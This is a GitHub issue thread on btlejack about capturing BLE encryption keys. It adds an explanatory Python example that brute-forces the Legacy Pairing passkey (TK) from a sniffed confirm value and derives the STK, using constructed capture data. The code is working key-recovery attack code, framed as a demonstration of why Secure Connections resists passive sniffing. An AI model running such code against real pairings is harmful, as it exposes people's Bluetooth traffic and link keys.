virtualabs / btlejack

Bluetooth Low Energy Swiss-army knife
MIT License
1.9k stars 196 forks

encryption information packets #84

Open aamert7 opened 1 year ago

aamert7 commented 1 year ago

Hello, I am establishing a connection between my Android phone and an nRF5 DK using the nRF Connect app, and trying to capture the LTK using btlejack on a single micro:bit chip. In many attempts I failed to capture all the packets, and the connection was always lost very fast; the best attempt was when I could capture the following packets together:

DeveloperMarius commented 2 months ago

Hey, the connection is encrypted with a key that is exchanged via a Diffie-Hellman key exchange. Thus, you cannot decrypt the packets. crackle only works with LE Legacy Pairing and not with the mentioned LE Secure Connections pairing using ECDH.

To my knowledge, there is no way to decrypt these packets captured with btlejack. When you want to analyze the contents of packets in an LE Secure Connections pairing, I would recommend recording them using the Android debugger: https://medium.com/@charlie.d.anderson/how-to-get-the-bluetooth-host-controller-interface-logs-from-a-modern-android-phone-d23bde00b9fa

~ Marius
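Added example (not btlejack or crackle code, and not part of this thread) showing why the distinction above matters for a passive sniffer. In LE Legacy Pairing both sides send `Mconfirm`/`Sconfirm = c1(TK, rand, preq, pres, iat, rat, ia, ra)` and derive `STK = s1(TK, Srand, Mrand)` (Core Spec Vol 3 Part H, 2.2.3 and 2.2.4); everything except TK is sent in the clear, and TK is 0 (Just Works) or a six-digit passkey, so one captured confirm value lets an attacker brute-force TK offline and recompute the STK, which is the link key under which the SMP Encryption Information PDU carrying the LTK is then sent. The pairing-request/response bytes, addresses, nonces and passkey below are constructed; the AES-128 implementation is a small pure-Python one so the block runs without third-party packages, and the function names `pair_legacy` / `attack_legacy` are this example's own. In LE Secure Connections the corresponding inputs are P-256 public keys and nonces, but the keys are derived from the ECDH shared secret, which needs one side's private key, so the same capture yields nothing.

```python
"""Legacy BLE pairing: recover TK (and thus STK) from sniffed values.
128-bit spec values are handled as Python ints in the spec's big-endian
notation; e() is AES-128 (FIPS-197) with the MSO of the int as key[0]."""


def _xtime(a):
    """Multiply by x in GF(2^8) modulo the AES polynomial."""
    a <<= 1
    return (a ^ 0x1B) & 0xFF if a & 0x100 else a


def _build_sbox():
    """Generate the AES S-box (GF(2^8) inverse followed by the affine map)."""
    sbox, p, q = [0] * 256, 1, 1          # invariant: p * q == 1 in GF(2^8)
    while True:
        p = p ^ ((p << 1) & 0xFF) ^ (0x1B if p & 0x80 else 0)   # p *= 3
        q ^= q << 1; q ^= q << 2; q ^= q << 4; q &= 0xFF        # q /= 3
        if q & 0x80:
            q ^= 0x09
        x = q
        for k in range(1, 5):                                   # affine map
            x ^= ((q << k) | (q >> (8 - k))) & 0xFF
        sbox[p] = x ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63                                              # 0 has no inverse
    return sbox


SBOX = _build_sbox()


def _expand_key(key):
    """AES-128 key schedule: 11 round keys, each 16 bytes in column-major order."""
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 1
    for i in range(4, 44):
        t = w[i - 1][:]
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]                # RotWord + SubWord
            t[0] ^= rcon
            rcon = _xtime(rcon)
        w.append([w[i - 4][j] ^ t[j] for j in range(4)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]


def _aes_encrypt_block(round_keys, block):
    """Encrypt one 16-byte block; the state is kept flat, column-major (s[4c+r])."""
    s = [b ^ k for b, k in zip(block, round_keys[0])]
    for rnd in range(1, 11):
        s = [SBOX[b] for b in s]                                            # SubBytes
        s = [s[(i % 4) + 4 * ((i // 4 + i % 4) % 4)] for i in range(16)]   # ShiftRows
        if rnd < 10:                                                        # MixColumns
            out = []
            for c in range(4):
                a = s[4 * c:4 * c + 4]
                t = a[0] ^ a[1] ^ a[2] ^ a[3]
                out += [a[i] ^ t ^ _xtime(a[i] ^ a[(i + 1) % 4]) for i in range(4)]
            s = out
        s = [b ^ k for b, k in zip(s, round_keys[rnd])]                     # AddRoundKey
    return bytes(s)


def c1(k, r, preq, pres, iat, rat, ia, ra):
    """Confirm value, Vol 3 Part H 2.2.3: e(k, e(k, r ^ p1) ^ p2).
    preq/pres are the 7-byte SMP PDUs as ints with the opcode as least significant octet."""
    p1 = (pres << 72) | (preq << 16) | (rat << 8) | iat      # pres || preq || rat' || iat'
    p2 = (ia << 48) | ra                                      # padding || ia || ra
    rk = _expand_key(k.to_bytes(16, "big"))
    inner = int.from_bytes(_aes_encrypt_block(rk, (r ^ p1).to_bytes(16, "big")), "big")
    return int.from_bytes(_aes_encrypt_block(rk, (inner ^ p2).to_bytes(16, "big")), "big")


def s1(k, r1, r2):
    """STK generation, Vol 3 Part H 2.2.4: e(k, r1[63:0] || r2[63:0])."""
    mask64 = (1 << 64) - 1
    rk = _expand_key(k.to_bytes(16, "big"))
    r = ((r1 & mask64) << 64) | (r2 & mask64)
    return int.from_bytes(_aes_encrypt_block(rk, r.to_bytes(16, "big")), "big")


# Constructed capture: everything a sniffer sees in the clear during legacy pairing.
CAPTURE = dict(preq=0x07071000000101, pres=0x05000800000302,
               iat=0x01, ia=0xA1A2A3A4A5A6, rat=0x00, ra=0xB1B2B3B4B5B6,
               mrand=0x5783D52156AD6F0E6388274EC6702EE0,
               srand=0x0123456789ABCDEF0123456789ABCDEF)


def pair_legacy(tk, cap):
    """Victim side: the confirm values both devices transmit and the STK they derive."""
    args = (cap["preq"], cap["pres"], cap["iat"], cap["rat"], cap["ia"], cap["ra"])
    return dict(mconfirm=c1(tk, cap["mrand"], *args),
                sconfirm=c1(tk, cap["srand"], *args),
                stk=s1(tk, cap["srand"], cap["mrand"]))


def attack_legacy(cap, sconfirm, max_tk=1_000_000):
    """Attacker side: brute-force TK (0 or a 6-digit passkey) from Sconfirm, then STK."""
    args = (cap["preq"], cap["pres"], cap["iat"], cap["rat"], cap["ia"], cap["ra"])
    for tk in range(max_tk):
        if c1(tk, cap["srand"], *args) == sconfirm:
            return tk, s1(tk, cap["srand"], cap["mrand"])
    return None


if __name__ == "__main__":
    victim = pair_legacy(123, CAPTURE)           # constructed passkey, kept small
    print("attacker recovers (TK, STK):", attack_legacy(CAPTURE, victim["sconfirm"]))
```

The full 10^6-candidate search takes minutes in pure Python (crackle does the same thing in C); the constructed passkey is kept small so the script finishes immediately. The c1 and s1 sample data in Vol 3 Part H can be used to cross-check the two functions against the spec. Note what the attack needs: the initiator and responder addresses and address types from the CONNECT_IND, the Pairing Request/Response PDUs, both rand values and one confirm value, all of which btlejack can capture if it follows the connection from the start; what it does not need is anything secret. The equivalent SC exchange replaces TK with an ECDH shared secret, which is exactly why the HCI snoop log on the phone (where the LTK itself is visible) is the practical route in that case.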